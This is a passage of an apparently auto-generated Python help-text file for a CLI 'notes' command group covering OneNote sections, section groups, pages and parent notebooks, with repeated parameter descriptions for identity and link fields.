users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for users" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in users" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for users" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in users" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for users" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in users" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or 